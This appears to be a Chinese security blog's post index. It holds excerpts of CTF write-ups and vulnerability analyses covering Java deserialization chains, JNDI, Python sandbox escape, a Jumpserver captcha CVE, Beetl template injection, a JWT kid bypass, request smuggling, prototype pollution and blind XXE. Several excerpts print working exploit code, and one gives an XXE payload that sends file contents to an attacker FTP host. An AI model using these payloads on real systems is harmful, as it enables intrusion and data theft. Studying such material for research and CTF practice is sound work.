Posts

VNCTF 5道web解出了4道 javaGuide /deser路由可以反序列化，有spring boot和fastjson 1.2.83的依赖。 反序列化有黑名单： protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException { String className = desc.getName(); String[] denyClasses = {"com.sun.org.apache.xalan.internal.xsltc.trax", "javax.management", "com.fasterxml.jackson"}; int length = denyClasses.length; for (String denyClass : denyClasses) { if (className.startsWith(denyClass)) { throw new InvalidClassException("Unauthorized deserialization attempt", className); } } return super.resolveClass(desc); } 可以用signedObject二次反序列化绕过 利用链： EventListenerList.readobject() -> JSONArray.toString() -> SignedObject.getObject() -> EventListenerList.readobject() -> JSONArray.toString() -> Templates.getOutputProperties() fastjson1.2.83使用引用绕过。 Templates templates = new TemplatesImpl(); setFieldValue(templates,"_bytecodes",new byte[][]{getEvilClass()}); setFieldValue(templates,"_class",null); setFieldValue(templates,"_name","asd"); JSONArray jsonArray1 = new JSONArray(); jsonArray1....

HessianProxy 浅蓝师傅在 探索高版本 JDK 下 JNDI 漏洞的利用方法 中提到过HessianProxyFactory这个工厂类。可以触发Hessian反序列化。 getObjectInstance代码如下： public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?,?> environment) throws Exception { Reference ref = (Reference) obj; String api = null; String url = null; for (int i = 0; i < ref.size(); i++) { RefAddr addr = ref.get(i); String type = addr.getType(); String value = (String) addr.getContent(); if (type.equals("type")) api = value; else if (type.equals("url")) url = value; ......... } ....

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏。 前言 javascript可以通过Function的构造方法从字符串创建函数。在eval被过滤的情况下可以通过字符串创建函数来绕过： atob.constructor('console.log(1);')(); 最近在学习python沙箱逃逸，学习了python也能像js那样使用构造方法创建函数。本文用于记录一下学到的python中关于__new__有趣的玩法。才疏学浅，如有错误还请师傅们指正。 python object 以下分析中python版本为3.12.6，不同版本略有差异 下载源码：https://github.com/python/cpython/ 首先梳理一下python的对象。 python中所有的对象都是由PyObject结构体扩展而来。type感觉类似于java里的Class，负责定义对象的一些基本信息。参考：https://flaggo.github.io/python3-source-code-analysis/objects/object/ type(obj)可以返回对象的type，type中的__new__方法用于创建对象。详细可参考MetaClass：https://liaoxuefeng.com/books/python/oop-adv/meta-class/ __new__最终会调用到PyXXXObject_New api，创建一个对象 PyFunctionObject PyFunctionObject的__new__定义在：cpython/Objects/funcobject.c，有如下注释： /*[clinic input] @classmethod function.__new__ as func_new code: object(type="PyCodeObject *", subclass_of="&PyCode_Type") a code object globals: object(subclass_of="&PyDict_Type") the globals dictionary name: object = None a string that overrides the name from the code object argdefs as defaults: object = None a tuple that specifies the default argument values closure: object = None a tuple that supplies the bindings for free variables Create a function object....

SECCON CTF 13th Quals Trillion_Bank 题目代码： import fastify from "fastify"; import crypto from "node:crypto"; import fs from "node:fs/promises"; import db from "./db.js"; const FLAG = process.env.FLAG ?? console.log("No flag") ?? process.exit(1); const TRILLION = 1_000_000_000_000; const app = fastify(); app.register(await import("@fastify/jwt"), { secret: crypto.randomBytes(32), cookie: { cookieName: "session" }, }); app.register(await import("@fastify/cookie")); const names = new Set(); const auth = async (req, res) => { try { await req.jwtVerify(); } catch { return res....

环境 Jumpserver <= v3.6.4中存在CVE-2023-42820漏洞，可以预测随机数导致验证码预测。 环境搭建 vulnhub或者官网 漏洞分析 github diff如下https://github.com/jumpserver/jumpserver/commit/ce645b1710c5821119f313e1b3d801470565aac0 random_string函数用于生成密码重置的验证码，去掉了random的seed，所以代码中应该有地方可以设置可控seed。 jumpserver v3.6.4使用了django-simple-captcha v0.5.18来生成验证码，而此版本中在captcha_image函数中设置了种子，但结束后未将其置空。 图片验证码逻辑 captcha相关路由如下： urlpatterns = [ re_path( r"image/(?P<key>\w+)/$", views.captcha_image, name="captcha-image", kwargs={"scale": 1}, ), re_path( r"image/(?P<key>\w+)@2/$", views.captcha_image, name="captcha-image-2x", kwargs={"scale": 2}, ), re_path(r"audio/(?P<key>\w+).wav$", views.captcha_audio, name="captcha-audio"), re_path(r"refresh/$", views.captcha_refresh, name="captcha-refresh"), ] 验证码刷新代码： def captcha_refresh(request): """Return json with new captcha for ajax refresh request""" if not request.headers.get("x-requested-with") == "XMLHttpRequest": raise Http404 new_key = CaptchaStore.pick() ...... @classmethod def generate_key(cls, generator=None): challenge, response = captcha_settings.get_challenge(generator)() store = cls....

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏。 前言 拿到了前段时间ciscn 2024 final的web题附件，来复现一下Fobee这道题，顺便学习一下beetl的模板注入。 3.15.x及以前的版本 过滤的很少，随便绕过。贴几个公开的poc： https://gitee.com/xiandafu/beetl/issues/I6RUIP https://gitee.com/xiandafu/beetl/issues/I914H3 3.16.0 3.16.0是题目使用的版本也是本文使用的版本。 测试环境为java8u65， beetl 3.16.0， solon 2.8.5 入口 @Mapping("/render") public ModelAndView render(String pass, String tp) throws Exception { ModelAndView model = new ModelAndView("render.htm"); if (pass != null && pass.equals(password)) { byte[] decode = Base64.getDecoder().decode(tp); String result = BeetlKit.render(new String(decode), new HashMap()); System.out.println(result); model.put("msg", getMD5Hash(result)); } else { model.put("msg", "Render Page"); } return model; } 渲染过程 由renderTo进入execute函数。然后遍历所有要执行的语句然后依次执行。 每条语句的具体执行代码在org.beetl.core.statement.NativeCallExpression#evaluate函数。 public Object evaluate(Context ctx) { Class targetCls = null; Object targetObj = null; NativeNode lastNode = null; if (insNode !...

d3pythonhttp 解决，一血 jwt绕过 def get_key(kid): key = "" dir = "/app/" try: with open(dir+kid, "r") as f: key = f.read() except: pass print(key) return key def verify_token(token): header = jwt.get_unverified_header(token) kid = header["kid"] key = get_key(kid) try: payload = jwt.decode(token, key, algorithms=["HS256"]) return True except: return False 验证jwt时kid控制密钥文件路径，如果设置的密钥文件不存在，则key为空，所以构造空秘钥以及一个不存在的文件即可： print(jwt.encode({"username":"admin","isadmin":true}, key, algorithm="HS256", headers={"kid": "frontend_keyasdasd"})) # eyJhbGciOiJIUzI1NiIsImtpZCI6ImZyb250ZW5kX2tleWFzZGFzZCIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaXNhZG1pbiI6dHJ1ZX0.LmTEt2GD0-nVv-yvf7Dc0lNAlQqBj9FYBb932_UWO6M 解析差异 一种做法是TE-CL请求走私。不过我用的是另一种办法：前端使用Flask，后端使用web.py存在解析差异。 经测试发现：前段对于chunked不分大小写，后端会区分。前端只进行分块传输，忽略Content-Length。而后端会先分块，再根据Content-Length截取，前端会把Content-Length直接发送给后端。 headers = {key: value for (key, value) in request.headers if key != 'Host'} 除了Host以外的header都发往后端了包括Content-Length，且前端不进行计算验证。 数据包：...

required note 用npm audit搜索历史漏洞。发现一个原型链污染的漏洞。 POC: const protobuf = require("protobufjs"); protobuf.parse('option(a).constructor.prototype.verified = true;'); console.log({}.verified); // returns true /create会进行protojs解析。 app.post('/create', (req, res) => { requestBody=req.body try{ schema = fs.readFileSync('./settings.proto', 'utf-8'); root = protobuf.parse(schema).root; Note = root.lookupType('Note'); [...] 在/customise可以修改settings.proto文件。 app.post('/customise',(req, res) => { try { const { data } = req.body; let author = data.pop()['author']; let title = data.pop()['title']; let protoContents = fs.readFileSync('./settings.proto', 'utf-8').split('\n'); if (author) { protoContents[5] = ` ${author} string author = 3 [default="user"];`; } if (title) { protoContents[3] = ` ${title} string title = 1 [default="user"];`; } fs....

Checkin sorce:100 题目源码: module movectf::checkin { use sui::event; use sui::tx_context::{Self, TxContext}; const ESTRING:u64 = 0; struct Flag has copy, drop { sender: address, flag: bool, } public entry fun get_flag(string: vector<u8>, ctx: &mut TxContext) { assert!(string == b"MoveBitCTF",ESTRING); event::emit(Flag { sender: tx_context::sender(ctx), flag: true, }); } } 带着MoveBitCTF字符串作为参数调用get_flag函数。传参要用字节。 # 转换为十六进制 print("0x") for i in "MoveBitCTF": print(hex(ord(i)).replace("0x",""),end="") 调用即可： sui client call --package package_id --module module_name --function get_flag --args 0x4d6f7665426974435446 --gas-budget 10000000 DynamicMatrixTraversal sorce: 200...

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏。 关于盲XXE的文件读取 盲XXE想要读取文件一般来说需要外带。但是如果文件中包含换行等特殊字符，直接http外带，会报无效url错误。 在php环境下，可以直接使用php伪协议中的filter进行编码转换，就不会报错了。 但在java环境下或者禁用filter的情况下，可以尝试用ftp://协议外带。 环境 这里使用的环境是Hello-Java-Sec的靶场环境 https://github.com/j3ers3/Hello-Java-Sec/ jdk8 漏洞代码： DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); DocumentBuilder builder = factory.newDocumentBuilder(); // 这里其实有回显，偷懒不改代码了，假装看不见。 原理 使用ftp://协议可以带出带有换行的数据。 （可利用版本：jdk<7u141和jdk<8u162，高于这两个版本ftp://协议也不能用了。） 正常的ftp服务器不能满足我们的需要，但我从网上找到的模拟ftp服务器都不能用（也可能是我不会用），于是就自己写了一个。 链接：https://github.com/zoiltin/fake-ftp-server 写脚本之前，先了解一下调用ftp://协议是发生了什么。通过读取/etc/passwd为例，payload：ftp://ip:port/{data}数据交互如下： 蓝色的为fake-ftp-server。 建立连接和确定模式后，服务器开始发送CWD指令，因为在/etc/passwd中有许多/将数据分割为许多目录，所以服务器一直尝试切换目录。我们要做的就是接受并不断返回250 Directory successfully changed.让服务器一直传数据。 在最后一个/后的数据，服务器将其视为要下载的文件名，请求用被动模式下载数据，从流量中可见，攻击者开启63568端口并告诉服务器，当服务器连接63568端口后，即向我们发送了要下载的文件名也就是最后一段数据。 ftp://协议比较简单，脚本很容易实现。 用法 payload: <!ENTITY % file SYSTEM "file://"> <!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://IP:PORT/%file;'>"> 简单的用法： ftp://IP:PORT/%file; 或者全用CWD读取： ftp://IP:PORT/%file;/ 数据中不能包含%和#，如果有'或"需要调整evil.dtd中包裹ftp://的引号类型，不然会报错。?和#会导致数据截断。 在高版本也可以十分有限的利用： ftp://username:%file;@IP:PORT/asdasd 将数据从密码处传递，只能读一行 如果文件有多行会报错，回显一部分。